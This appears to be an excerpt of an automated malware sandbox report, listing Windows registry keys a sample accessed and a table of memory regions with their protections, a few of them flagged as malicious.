HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 450 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
 malicious
8B1000
heap
page read and write
 malicious
4477000
trusted library allocation
page read and write
 malicious
93C0000
trusted library section
page read and write
 malicious
1F8E000
stack
page read and write
202000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
3B9000
heap
page read and write
290000
trusted library allocation
page read and write
3530000
trusted library allocation
page read and write
2A54000
trusted library allocation
page read and write
346000
heap
page read and write
44FE000
stack
page read and write
3D4E000
stack
page read and write
2DEE000
stack
page read and write
15A000
stack
page read and write
5DFF000
stack
page read and write
3B8B000
heap
page read and write
3DD000
heap
page read and write
F12000
trusted library allocation
page read and write
530000
heap
page read and write
38C4000
heap
page read and write
4EF000
heap
page read and write
2AD3000
trusted library allocation
page read and write
11DF000
stack
page read and write
3A8F000
stack
page read and write
2D52000
heap
page read and write
10000
heap
page read and write
3962000
heap
page read and write
3962000
heap
page read and write
3B9000
heap
page read and write
3531000
trusted library allocation
page read and write
29CC000
trusted library allocation
page read and write
3DD000
stack
page read and write
1E40000
direct allocation
page read and write
3A7000
heap
page read and write
3B06000
heap
page read and write
156000
stack
page read and write
1CF5000
heap
page read and write
D80000
trusted library allocation
page read and write
725000
heap
page read and write
A0F000
stack
page read and write
2BF000
heap
page read and write
2CC000
heap
page read and write
46B000
heap
page read and write
5AB000
heap
page read and write
4ECE000
stack
page read and write | page guard
BDC1000
trusted library allocation
page read and write
3F35000
heap
page read and write
38A000
heap
page read and write
12DE000
stack
page read and write
3771000
trusted library allocation
page read and write
4D1E000
stack
page read and write
2A33000
trusted library allocation
page read and write
33C000
heap
page read and write
D7E000
stack
page read and write
2D6F000
heap
page read and write
3D9000
heap
page read and write
20000
heap
page read and write
8E0000
heap
page execute and read and write
4FAD000
stack
page read and write
3B26000
heap
page read and write
38D1000
heap
page read and write
3BD000
heap
page read and write
4E7F000
stack
page read and write
9680000
heap
page read and write
4AEE000
stack
page read and write
42A0000
trusted library allocation
page read and write
42A0000
trusted library allocation
page read and write
2A35000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
34D000
heap
page read and write
475000
heap
page read and write
4AC6000
heap
page read and write
36B000
heap
page read and write
4F0000
trusted library allocation
page read and write
4B1B000
heap
page read and write
463000
heap
page read and write
DB0000
heap
page read and write
2D7C000
heap
page read and write
4F70000
heap
page read and write
3D0F000
stack
page read and write
4BE1000
heap
page read and write
1D70000
heap
page read and write
3F30000
heap
page read and write
8A0000
heap
page read and write
F30000
heap
page read and write
516000
heap
page execute and read and write
3B9000
heap
page read and write
78C000
heap
page read and write
36B000
heap
page read and write
1F7000
trusted library allocation
page execute and read and write
36B000
heap
page read and write
194000
trusted library allocation
page read and write
34F0000
heap
page read and write
29C2000
trusted library allocation
page read and write
590000
heap
page read and write
3B06000
heap
page read and write
540000
heap
page read and write
4B2D000
stack
page read and write
446000
heap
page read and write
4DD000
stack
page read and write
36E000
stack
page read and write
5EC000
stack
page read and write
106C000
stack
page read and write
44E000
heap
page read and write
426000
stack
page read and write
3B4B000
heap
page read and write
109E000
unkown
page read and write
38C9000
heap
page read and write
50B2000
heap
page read and write
3B0000
heap
page read and write
4C0E000
stack
page read and write
980000
heap
page read and write
3B54000
heap
page read and write
27D5000
trusted library allocation
page read and write
4E4000
heap
page read and write
2256000
heap
page read and write
457000
heap
page read and write
860000
trusted library allocation
page read and write
2C94000
heap
page read and write
112E000
unkown
page read and write
1C0000
trusted library allocation
page read and write
8EF000
heap
page read and write
8DC1000
trusted library allocation
page read and write
2F7D000
stack
page read and write
38B0000
heap
page read and write
3B38000
heap
page read and write
3AD2000
heap
page read and write
215000
trusted library allocation
page execute and read and write
ECE000
stack
page read and write
5D5E000
stack
page read and write
1D2B000
heap
page read and write
70C000
heap
page read and write
391F000
stack
page read and write
44F000
heap
page read and write
28AA000
trusted library allocation
page read and write
3744000
heap
page read and write
3939000
heap
page read and write
50CD000
heap
page read and write
3930000
heap
page read and write
D90000
trusted library allocation
page read and write
4D31000
heap
page read and write
42E000
heap
page read and write
A1E000
stack
page read and write
3B06000
heap
page read and write
217000
trusted library allocation
page execute and read and write
3799000
trusted library allocation
page read and write
3B30000
heap
page read and write
368000
heap
page read and write
79A000
heap
page read and write
1D4000
trusted library allocation
page read and write
3B3000
heap
page read and write
95A000
stack
page read and write
2FA000
trusted library allocation
page read and write
2BFC000
trusted library allocation
page read and write
5088000
heap
page read and write
3A40000
heap
page read and write
4DFD000
heap
page read and write
42A0000
trusted library allocation
page read and write
B73000
heap
page read and write
1D3000
trusted library allocation
page execute and read and write
29F000
heap
page read and write
FD0000
trusted library allocation
page execute and read and write
3B06000
heap
page read and write
1DA6000
heap
page read and write
26EF000
stack
page read and write
2771000
trusted library allocation
page read and write
50E000
stack
page read and write
38E2000
heap
page read and write
3FF000
heap
page read and write
5F80000
heap
page read and write
27B8000
trusted library allocation
page read and write
500000
trusted library allocation
page read and write
5D0E000
stack
page read and write
3A90000
heap
page read and write
36D000
heap
page read and write
5E0000
heap
page read and write
2C2F000
stack
page read and write
2D53000
heap
page read and write
1050000
trusted library allocation
page execute and read and write
27F000
stack
page read and write
42A000
stack
page read and write
396E000
stack
page read and write
2100000
heap
page read and write
8E6000
heap
page read and write
B30000
heap
page read and write
2291000
heap
page read and write
10000
heap
page read and write
10B000
stack
page read and write
4CEE000
stack
page read and write | page guard
396000
heap
page read and write
3B4B000
heap
page read and write
A30000
heap
page read and write
33C000
heap
page read and write
1CF0000
heap
page read and write
2C8000
heap
page read and write
2D40000
heap
page read and write
10EE000
stack
page read and write
1FF000
heap
page read and write
5013000
heap
page read and write
EBC000
stack
page read and write
665000
heap
page read and write
4C6E000
stack
page read and write
3B21000
heap
page read and write
63C1000
trusted library allocation
page read and write
EFE000
stack
page read and write
200000
trusted library allocation
page read and write
A10000
heap
page read and write
1070000
trusted library allocation
page read and write
560000
trusted library allocation
page read and write
29DE000
trusted library allocation
page read and write
D40000
trusted library allocation
page read and write
193000
trusted library allocation
page execute and read and write
2D72000
heap
page read and write
38B9000
heap
page read and write
3A0000
heap
page read and write
29DA000
trusted library allocation
page read and write
3962000
heap
page read and write
FCE000
stack
page read and write
4E0000
heap
page read and write
257000
stack
page read and write
F52000
heap
page read and write
320000
heap
page read and write
34D000
heap
page read and write
A0E000
stack
page read and write | page guard
270000
heap
page read and write
3B35000
heap
page read and write
3CED000
stack
page read and write
293000
trusted library allocation
page read and write
177000
stack
page read and write
263C000
stack
page read and write
562000
heap
page read and write
2D3D000
heap
page read and write
2B2E000
stack
page read and write
970000
trusted library allocation
page read and write
4F3E000
stack
page read and write
310000
trusted library allocation
page read and write
3A0000
trusted library allocation
page read and write
2BFE000
trusted library allocation
page read and write
3D9000
heap
page read and write
390000
trusted library allocation
page read and write
3DA0000
heap
page read and write
4AC5000
heap
page read and write
4C2E000
stack
page read and write
238C000
heap
page read and write
38D9000
trusted library allocation
page read and write
5CE000
heap
page read and write
3B16000
heap
page read and write
412D000
stack
page read and write
3FFF000
stack
page read and write
ABD000
stack
page read and write
42B000
heap
page read and write
3B43000
heap
page read and write
E30000
trusted library allocation
page read and write
310000
trusted library allocation
page read and write
4EF000
heap
page read and write
614000
heap
page read and write
3B3C000
heap
page read and write
2B70000
trusted library allocation
page read and write
2D56000
heap
page read and write
25C000
stack
page read and write
20CF000
stack
page read and write
F34000
heap
page read and write
44B000
heap
page read and write
319000
trusted library allocation
page read and write
254C000
heap
page read and write
940000
remote allocation
page read and write
5D9E000
stack
page read and write
2810000
trusted library allocation
page read and write
B5E000
heap
page read and write
33A0000
heap
page read and write
30E000
stack
page read and write
85E000
stack
page read and write
2D53000
heap
page read and write
65F000
heap
page read and write
4DE000
stack
page read and write | page guard
A70000
trusted library allocation
page read and write
51E000
stack
page read and write | page guard
42A0000
trusted library allocation
page read and write
3A6000
heap
page read and write
6DC1000
trusted library allocation
page read and write
62B000
heap
page read and write
3B2E000
heap
page read and write
870000
heap
page read and write
19D000
trusted library allocation
page execute and read and write
437000
heap
page read and write
2B6000
heap
page read and write
73C1000
trusted library allocation
page read and write
3DB000
heap
page read and write
42A0000
trusted library allocation
page read and write
B6E000
heap
page read and write
3FE000
heap
page read and write
3C02000
heap
page read and write
4520000
heap
page read and write
101F000
stack
page read and write
89000
stack
page read and write
2FC000
stack
page read and write
3B1D000
heap
page read and write
6391000
heap
page read and write
3B3E000
heap
page read and write
3D3000
heap
page read and write
5F0000
heap
page read and write
28AB000
trusted library allocation
page read and write
3B06000
heap
page read and write
91F000
heap
page read and write
3B9000
heap
page read and write
212000
trusted library allocation
page read and write
907000
heap
page read and write
6AE000
heap
page read and write
6ED000
heap
page read and write
394F000
heap
page read and write
2D2E000
heap
page read and write
388000
heap
page read and write
3B06000
heap
page read and write
42A0000
trusted library allocation
page read and write
2290000
heap
page read and write
3AA000
heap
page read and write
520000
trusted library allocation
page read and write
3A8000
heap
page read and write
E2E000
stack
page read and write
3920000
heap
page read and write
940000
remote allocation
page read and write
7A8000
heap
page read and write
1A0000
trusted library allocation
page read and write
1CE4000
heap
page read and write
437000
heap
page read and write
39B000
heap
page read and write
20000
heap
page read and write
78C000
heap
page read and write
3F1000
heap
page read and write
2D53000
heap
page read and write
4C1E000
stack
page read and write
3E2000
heap
page read and write
3AD3000
heap
page read and write
666000
heap
page read and write
4B45000
heap
page read and write
2D6B000
heap
page read and write
38AF000
stack
page read and write
2DF000
stack
page read and write
422000
heap
page read and write
3AD0000
heap
page read and write
34C000
heap
page read and write
360000
heap
page execute and read and write
3870000
heap
page read and write
A40000
trusted library allocation
page read and write
42A0000
trusted library allocation
page read and write
FBF000
stack
page read and write
2D4D000
heap
page read and write
1170000
trusted library allocation
page read and write
3B39000
heap
page read and write
190000
trusted library allocation
page read and write
B20000
heap
page read and write
260000
trusted library allocation
page read and write
C1A000
stack
page read and write
F00000
trusted library allocation
page read and write
383D000
stack
page read and write
349000
heap
page read and write
5EBE000
stack
page read and write
2C0000
heap
page read and write
58D000
stack
page read and write
3D1000
heap
page read and write
34A000
heap
page read and write
242000
trusted library allocation
page read and write
3944000
heap
page read and write
2A7A000
trusted library allocation
page read and write
277000
heap
page read and write
624000
heap
page read and write
3A8000
heap
page read and write
36E000
heap
page read and write
2D53000
heap
page read and write
329E000
stack
page read and write
330000
heap
page execute and read and write
4E6D000
heap
page read and write
712000
heap
page read and write
2D10000
heap
page read and write
7A3000
heap
page read and write
42D9000
trusted library allocation
page read and write
B80000
trusted library allocation
page execute and read and write
B3C1000
trusted library allocation
page read and write
3B34000
heap
page read and write
3B1E000
heap
page read and write
373F000
heap
page read and write
47AD000
stack
page read and write
3A8000
heap
page read and write
4BCF000
heap
page read and write
3AA6000
heap
page read and write
2A9000
heap
page read and write
29FE000
trusted library allocation
page read and write
443000
heap
page read and write
4E3E000
stack
page read and write
52CD000
stack
page read and write
240000
trusted library allocation
page read and write
AA6000
heap
page read and write
4A9E000
stack
page read and write
2D40000
heap
page read and write
36E000
heap
page read and write
267E000
stack
page read and write
248E000
stack
page read and write
540000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
3C06000
heap
page read and write
39B000
heap
page read and write
2BFE000
stack
page read and write
337E000
stack
page read and write
1060000
trusted library allocation
page read and write
640000
heap
page read and write
3C2000
heap
page read and write
2D7C000
heap
page read and write
D8E000
stack
page read and write
2C9000
heap
page read and write
4B46000
heap
page read and write
4DF000
stack
page read and write
3B38000
heap
page read and write
30D0000
heap
page read and write
3D6000
heap
page read and write
3D7000
heap
page read and write
8D0000
trusted library allocation
page read and write
278A000
trusted library allocation
page read and write
633000
heap
page read and write
3799000
trusted library allocation
page read and write
3B38000
heap
page read and write
6CA000
heap
page read and write
29EF000
stack
page read and write
250000
trusted library allocation
page execute and read and write
61F000
heap
page read and write
500E000
heap
page read and write
41F000
heap
page read and write
8AC000
heap
page read and write
2F0000
trusted library allocation
page read and write
50D5000
heap
page read and write
F4E000
stack
page read and write
10FC000
stack
page read and write
42A0000
trusted library allocation
page read and write
C3C1000
trusted library allocation
page read and write
72C5000
trusted library allocation
page read and write
66F000
heap
page read and write
4230000
trusted library allocation
page read and write
3ACC000
heap
page read and write
4690000
heap
page read and write
38CA000
heap
page read and write
877000
heap
page read and write
3AD2000
heap
page read and write
2C98000
heap
page read and write
392C000
stack
page read and write
4F0000
heap
page read and write
390000
heap
page read and write
335D000
stack
page read and write
3B0000
heap
page read and write
251F000
stack
page read and write
3B6000
heap
page read and write
46CC000
stack
page read and write
4E30000
trusted library allocation
page read and write
4E50000
heap
page read and write
2122000
heap
page read and write
241F000
stack
page read and write
25EE000
stack
page read and write
62E000
heap
page read and write
4FC4000
heap
page read and write
59A000
heap
page read and write
50CA000
heap
page read and write
10000
heap
page read and write
230000
trusted library allocation
page read and write
3C9000
heap
page read and write
B6B000
stack
page read and write
348F000
stack
page read and write
4BE1000
heap
page read and write
CC000
stack
page read and write
4E30000
trusted library allocation
page read and write
5DFE000
stack
page read and write | page guard
4FD0000
heap
page read and write
180000
heap
page read and write
275E000
stack
page read and write
3B3000
heap
page read and write
41A000
heap
page read and write
368000
heap
page read and write
2BA000
heap
page read and write
608E000
stack
page read and write
B4D000
heap
page read and write
2AC000
heap
page read and write
2C9B000
heap
page read and write
2A14000
trusted library allocation
page read and write
38E2000
heap
page read and write
4D13000
heap
page read and write
394A000
heap
page read and write
313000
trusted library allocation
page read and write
3533000
trusted library allocation
page read and write
47E000
stack
page read and write
3A0000
heap
page read and write
3990000
heap
page read and write
3F39000
heap
page read and write
2993000
trusted library allocation
page read and write
2791000
trusted library allocation
page read and write
104C000
stack
page read and write
714000
heap
page read and write
3B42000
heap
page read and write
4EC000
heap
page read and write
11EB000
stack
page read and write
8E6000
heap
page execute and read and write
2A50000
trusted library allocation
page read and write
3700000
heap
page read and write
29CE000
trusted library allocation
page read and write
417000
heap
page read and write
D3D000
stack
page read and write
36E000
heap
page read and write
2B0000
trusted library allocation
page read and write
3E9000
heap
page read and write
29A000
heap
page read and write
580000
heap
page read and write
398C000
stack
page read and write
3AD3000
heap
page read and write
1D2B000
heap
page read and write
125E000
stack
page read and write
38C4000
heap
page read and write
31C000
heap
page read and write
4BC7000
heap
page read and write
B90000
heap
page execute and read and write
3962000
heap
page read and write
4BD7000
heap
page read and write
A60000
trusted library allocation
page read and write
DA0000
trusted library allocation
page read and write
3B4C000
heap
page read and write
36FD000
stack
page read and write
265F000
stack
page read and write
2B50000
heap
page read and write
3771000
trusted library allocation
page read and write
38C0000
trusted library allocation
page read and write
36E000
heap
page read and write
33DE000
trusted library allocation
page read and write
2D59000
heap
page read and write
8B0000
trusted library allocation
page read and write
550000
trusted library allocation
page read and write
42A0000
trusted library allocation
page read and write
38B1000
heap
page read and write
4FC0000
heap
page read and write
4E30000
trusted library allocation
page read and write
87B000
heap
page read and write
3DED000
stack
page read and write
348000
heap
page read and write
3BCE000
stack
page read and write
116E000
stack
page read and write
4E7E000
stack
page read and write | page guard
B1E000
stack
page read and write
4DDE000
stack
page read and write
50C3000
heap
page read and write
2E0000
trusted library allocation
page read and write
4F92000
heap
page read and write
1FF000
heap
page read and write
1F4000
heap
page read and write
4C6E000
stack
page read and write
3B4B000
heap
page read and write
3050000
heap
page read and write
3931000
heap
page read and write
490000
trusted library allocation
page execute and read and write
320000
heap
page read and write
28EF000
stack
page read and write
6F1000
heap
page read and write
364000
heap
page read and write
1EA000
stack
page read and write
2450000
heap
page read and write
480000
trusted library allocation
page read and write
42A0000
trusted library allocation
page read and write
3E0E000
stack
page read and write
810000
trusted library allocation
page read and write
F0E000
stack
page read and write
38D000
heap
page read and write
2C6E000
stack
page read and write
254C000
heap
page read and write
2A0000
trusted library allocation
page execute and read and write
3FB000
heap
page read and write
4ECF000
stack
page read and write
3B25000
heap
page read and write
299000
trusted library allocation
page read and write
3B9000
heap
page read and write
15B000
stack
page read and write
10000
heap
page read and write
1CE0000
heap
page read and write
42A0000
trusted library allocation
page read and write
58E000
heap
page read and write
1A4000
trusted library allocation
page read and write
50FE000
stack
page read and write
4C70000
heap
page read and write
446000
heap
page read and write
3B2E000
heap
page read and write
3E20000
heap
page read and write
83C1000
trusted library allocation
page read and write
1E5000
stack
page read and write
3B9000
heap
page read and write
A88000
heap
page read and write
3B38000
heap
page read and write
627000
heap
page read and write
3944000
heap
page read and write
34D000
heap
page read and write
2FE0000
heap
page read and write
4CE000
stack
page read and write
2E0000
heap
page read and write
3B0000
heap
page read and write
3A94000
heap
page read and write
10000
heap
page read and write
4B7E000
stack
page read and write
44B000
heap
page read and write
652000
heap
page read and write
3FE000
stack
page read and write
970000
trusted library allocation
page read and write
9C0000
trusted library allocation
page read and write
4EB000
heap
page read and write
DA0000
trusted library allocation
page read and write
4BC6000
heap
page read and write
6B0000
heap
